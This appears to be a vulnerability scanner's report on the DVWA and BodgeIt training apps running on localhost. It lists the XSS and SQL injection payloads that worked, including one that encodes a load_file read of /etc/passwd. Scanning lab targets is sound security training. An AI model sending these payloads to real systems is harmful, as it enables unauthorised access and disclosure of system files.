Vulnerabilities found on http://127.0.0.1/dvwa/vulnerabilities/xss_r/...
------------------------------------------------------------
	Cross site scripting
		Form Unamed Form:
			>"><script>document.cookie="randomcookie=xss";</script>&
	Improperly Sanitized Data
		Form Name: Unamed Form
Vulnerabilities found on http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/...
------------------------------------------------------------
	SQL Injection
		Form :
		'||'6
		' OR '1'='1
		' or 'a'='a
		1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Vulnerabilities found on http://127.0.0.1/dvwa/vulnerabilities/sqli/...
------------------------------------------------------------
	SQL Injection
		Form :
		'||'6
		' OR '1'='1
		' or 'a'='a
		1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
Vulnerabilities found on http://127.0.0.1/dvwa/vulnerabilities/brute/...
------------------------------------------------------------
	SQL Injection
		Form :
		Admin' OR '
Vulnerabilities found on http://127.0.0.1:8080/bodgeit/search.jsp...
------------------------------------------------------------
	Cross site scripting
		Form Unamed Form:
			>"><script>document.cookie="randomcookie=xss";</script>&
	Improperly Sanitized Data
		Form Name: Unamed Form
